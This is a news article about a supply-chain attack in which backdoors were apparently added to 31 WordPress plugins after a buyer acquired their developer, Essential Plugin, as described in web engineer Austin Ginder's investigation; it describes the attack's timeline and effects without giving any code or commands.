Backdoors discovered in 31 WordPress plugins, added in updates after ownership transfer.
Web engineer Austin Ginder has published a blog post detailing how backdoors were embedded in 31 plugins owned by Essential Plugin, a company that develops WordPress plugins.
Someone Bought 30 WordPress Plugins and Planted a Backdoor in All of Them.
Ginder received a call from a customer who said, 'The WordPress.org plugin team has warned that the Countdown Timer Ultimate plugin contains code that could allow unauthorized access by third parties,' and he conducted an investigation.
Although a forced update by WordPress.org removed the malicious code embedded in the plugin, unauthorized access had already occurred, and the wp-config.php file, a critical WordPress configuration file, had been rewritten, resulting in fake pages and spam links being displayed to Googlebot.
Ginder decided to repair the compromised files and investigate how the malicious code ended up being embedded in the plugin.
Essential Plugin, the developer of Countdown Timer Ultimate, is an India-based team that offers over 30 different plugins. The plugins are basically free, with paid versions offering advanced customization options.
However, due to a roughly 40% decrease in revenue following the COVID-19 pandemic, founder Minesh Shah decided to sell Essential Plugin in 2025 and listed it on the online business marketplace Flippa. The business was purchased by Chris, who has experience in SEO, cryptocurrency, and online gambling marketing, and the purchase price was in the 'six figures' (over $100,000, or approximately 16 million yen).
From Plugin to Payday: How To Sell a WordPress Plugin Business for 6-Figures on Flippa - Flippa
Ownership of the plugin appears to have been transferred to Chris around May 2025, and the first update by the new owner took place on August 8, 2025. According to Ginder's investigation, a backdoor was planted in this first update. The backdoor executed code obtained directly from the attack server, a typical 'remote code execution attack.'
The backdoor was installed on August 8, 2025, and remained dormant for approximately eight months, remaining inactive. However, around April 5, 2026, the backdoor began to be exploited, resulting in actions such as rewriting the wp-config.php file. On April 7, 2026, the WordPress.org plugin team deactivated 31 plugins owned by Essential Plugin to prevent further damage.
On March 31, 2026, Ginder discovered another instance of malicious code being injected into a plugin that involved a transfer of ownership, warning that 'the WordPress ecosystem lacks mechanisms to monitor or notify when plugin ownership is transferred, creating an environment where supply chain attacks are easily carried out.'
Related Posts:
